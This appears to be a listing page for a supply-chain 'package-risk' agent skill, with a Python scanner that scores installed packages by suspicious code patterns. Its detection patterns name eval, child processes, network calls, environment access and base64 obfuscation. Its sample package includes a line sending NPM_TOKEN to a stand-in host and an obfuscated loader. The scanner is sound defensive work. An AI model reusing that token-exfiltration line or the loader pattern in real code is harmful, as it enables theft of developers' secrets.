package-risk

$ npx mdskill add hrconsultnj/claude-plugins/package-risk

Analyzes installed package source code for suspicious patterns like eval and network calls to assess supply chain risk.

  • Helps developers identify potential security threats in dependencies by scanning for risky behaviors.
  • Integrates with a fetch command for secure content loading, handling caching and decryption.
  • Scores packages based on detected patterns and provides file and line context for findings.
  • Presents results with a risk score and detailed reports of suspicious code locations.

SKILL.md

.github/skills/package-risk
---
name: package-risk
description: Analyze an installed package's source code for suspicious behavior patterns (eval, network calls, env access, obfuscation).
argument-hint: "<package-name> [--ecosystem js|python|rust|go]"
---

Inspect an installed package's source code for behavioral signals that indicate supply chain risk. Scores the package and reports suspicious patterns with file:line context.

## Content Loading

Load each step through the fetch command (handles caching, decryption, and auth):

```bash
"~/.composure/bin/composure-fetch.mjs" skill sentinel package-risk {step-filename}
```

**Do NOT read cache files directly** — they are encrypted at rest. Always use the fetch command above.

## Steps

| # | File |
|---|------|
| 1 | `01-locate-package.md` |
| 2 | `02-behavior-scan.md` |
| 3 | `03-score-and-report.md` |
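As an added illustration (not the skill's own code; its real pattern list and weights live in the step files above, which this page does not reproduce), here is a minimal scanner in the shape steps 2 and 3 describe: match behavioral signals per line, keep file:line context for each hit, and score the package by the set of distinct signals it exhibits. The signal regexes, weights, combo bonuses and the sample package are all constructed for this example.

```python
import re
# Behavioral signals and weights (constructed here; the skill's own list is in its step files).
SIGNALS = {
    "dynamic-eval": (re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("), 5),
    "child-process": (re.compile(r"require\(['\"]child_process['\"]\)|\b(?:execSync|spawn)\s*\("), 4),
    "network": (re.compile(r"require\(['\"](?:https?|net|dgram|dns)['\"]\)|\bfetch\s*\("), 3),
    "env-access": (re.compile(r"\bprocess\.env\b"), 2),
    "obfuscation": (re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|(?:\\x[0-9a-fA-F]{2}){6,}"), 3),
}
# Pairs that form a concrete attack shape (read secret + send it; decode blob + run it) earn a bonus.
COMBOS = {("env-access", "network"): 5, ("dynamic-eval", "obfuscation"): 5}

def scan_file(rel_path, text):
    """Return (signal, 'file:line', stripped source line) for every hit in one file."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for name, (rx, _weight) in SIGNALS.items():
            if rx.search(line):
                hits.append((name, f"{rel_path}:{lineno}", line.strip()))
    return hits

def scan_package(files):
    """files maps relative path -> source text; in real use, read them from node_modules/<pkg>."""
    hits = []
    for rel_path in sorted(files):
        hits.extend(scan_file(rel_path, files[rel_path]))
    return hits

def risk_score(hits):
    """Each signal kind counts once, so one noisy file cannot inflate the score."""
    kinds = {name for name, _loc, _src in hits}
    total = sum(SIGNALS[k][1] for k in kinds)
    total += sum(bonus for pair, bonus in COMBOS.items() if set(pair) <= kinds)
    level = "high" if total >= 12 else "medium" if total >= 5 else "low"
    return total, level

# Constructed sample package (not a real one): benign entry point, secret exfiltration, obfuscated loader.
SAMPLE = {
    "index.js": "module.exports = (a, b) => a + b;\n",
    "lib/telemetry.js": "const token = process.env.NPM_TOKEN;\n"
                        "require('https').request({host: 'example.invalid'}).end(token);\n",
    "lib/loader.js": "new Function(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString())();\n",
}

if __name__ == "__main__":
    hits = scan_package(SAMPLE)
    print("risk score: %d (%s)" % risk_score(hits))
    for name, loc, src in hits:
        print(f"  [{name}] {loc}  {src}")
```

Scoring on distinct signal kinds plus combinations is what keeps a package that merely calls `fetch` once from scoring like one that reads `process.env` and then opens a socket.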
